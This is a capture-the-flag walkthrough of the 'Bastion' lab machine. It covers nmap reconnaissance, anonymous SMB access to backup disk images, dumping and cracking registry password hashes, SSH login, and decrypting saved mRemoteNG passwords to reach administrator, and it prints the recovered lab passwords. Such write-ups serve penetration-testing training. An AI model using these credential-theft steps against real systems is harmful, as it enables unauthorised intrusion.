Bastion

Windows

Recon: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.134

22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)

135/tcp open  msrpc        Microsoft Windows RPC

139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn

445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds

Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-13T08:33:59
|_  start_date: 2024-01-13T03:25:59
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -2s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-01-13T09:33:57+01:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.36 seconds

OpenSSH on Windows is neat.

Enumeration: SSH Port 22/tcp

OpenSSH for_Windows_7.9 (protocol 2.0)

Enumeration: msrpc Port 135/tcp

Microsoft Windows RPC: Before checking in the shares, I want to see if I can also get an anonymous session over RPC.

As a result of both services allowing anonymous acces, I decided to run enum4linux to gather info on the system while I manually check the Backups share.

However, the enum4linux scan was not able to connect for some reason, so I will continue with enumerating the Backups share and then enumerate RPC manually if needed.

Enumeration: SMB Port 139/445/tcp

smbmap doesn’t give me much with a normal run, but will with a bad user name:

smbclient shows me the Backups share as well:

Backups Share: Connecting to Backups, I see two files and a directory:

Once in the share I decided to grab all the files inside (big mistake – do NOT do this – mount it instead (instructions below))

The two virtual hard disk files are HUGE and were taking a long time to download, so I decided to check the other files that downloaded already while I wait. Starting with note.exe…

A Windows Image Backup is likely to be large and the transfer will be slow (as the note warns). Rather than try to copy it over, I’m going to mount this share to my filesystem. NOTE – To mount the share rather than downloading these huge files, use the following commands:

I’ll list all the files in the share:

I see two disk image vhd files.

Mount vhd: I’m going to mount the virtual disk files and see what I can find in them. First, I’ll install guestmount with apt install libguestfs-tools, a tool for mounting virtual hard disk files on Linux.

Logoguestmount(1) - Linux man pagelinux.die.net

Now, I’ll try to mount each of the two VHD files. The first one fails:

The second one works, providing access to what looks like a Windows file system root:

Shell as l4mpje

Dump Hashes From Registry: With full access to the file system, I have access to the registry files. These files can be locked when the system is running, but I won’t have that issue on a mounted drive. In the config directory where the registry hives are stored, I’ll use secretsdump.py to dump the password hashes:

I’ll also notice that secretsdump.py identified a default password (or autolongon password) of “bureaulampje” for an unknown user.

Crack Hash: Submitting the NTLM hashes to crackstation returns the same password for the l4mpje account:

LogoCrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

SSH: Seeing ssh on a Windows box is a bit unusual, but this seems like a good chance to use it. I can ssh in as l4mpje:

Privesc to administrator

In looking at the installed programs on the host, mRemoteNG jumps out as interesting:

mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:

LogoGitHub - mRemoteNG/mRemoteNG: mRemoteNG is the next generation of mRemote, open source, tabbed, multi-protocol, remote connections manager.GitHub

It’s xml, with encrypted versions of the passwords stored in the file:

I solved this box right when it was released, and the above file is what it was at that time. It seems that the file has been changed since then. It doesn’t matter, the results are the same. But if you see different values from what I have, that is why. The resulting passwords will be the same.

Extract Passwords: Old Techniques There’s a lot of articles like this and this that target an older version of the software that used a static key to decrypt the passwords. The Metasploit module abuses this as well. Starting in version 1.76, the use can now choose a master password, but there is still a default password or “mR3m”. But, the default AES block mode also changed, which leaves all the older tools still incapabile of decrpyting newer files.

Stealing Passwords from mRemotecosine-security.blogspot.com
LogoTriggered!*(#*!(#*!packetstormsecurity.com
Logometasploit-framework/modules/post/windows/gather/credentials/mremote.rb at master · rapid7/metasploit-frameworkGitHub

Method 1: From Within mRemoteNG

I’ll open my Commando VM and install mRemoteNG. Then I’ll drop the confCons.xml file from target into C:\Users\0xdf\AppData\Roaming\mRemoteNG and re-open mRemoteNG. I’ll see two connections listed:

LogoCommando VM: Installation0xdf hacks stuff

mRemoteNG doesn’t want to just tell me the passwords. However, I can use the fact that the program wants to allow me to connect it to external tools that it may not be pre-programed to work with by creating a new External Tool by going to Tools -> External Tools -> New External Tool. In the Window that opens, I’ll add a display name, filename, and arguments as follows:

My external tool is just cmd, and I have it running an echo with the username and password. Now I can right-click on a connection, go to External Tools, and Password is an option: Clicking it pops a cmd window with the password at the top: The password for L4mpje matches what I already know. The password for DC is new:

Now I have the administrtor password, “thXLHM96BeKL0ER2”.

Method 2: mremoteng-decrypt Around the time Bastion came out, mremoteng-decrypt showed up on GitHub. At the time, there was only a java release, which I downloaded and ran here, and it worked:

LogoGitHub - kmahyyg/mremoteng-decrypt: mRemoteNG Config File DecryptGitHub
LogoReleases · kmahyyg/mremoteng-decryptGitHub

I see now that there is a python script as well, though I haven’t played with it.

Method 3: Script It

Logo0xdf / CTFScripts · GitLabGitLab

At the time I was solving, there was only a java version on that GitHub, and I wanted a python version. So I wrote a quick script:

It takes a consCons.xml file, and prints all the decrpyted passwords it can find.

SSH:

PreviousCascade #5 ADNextServMon

Last updated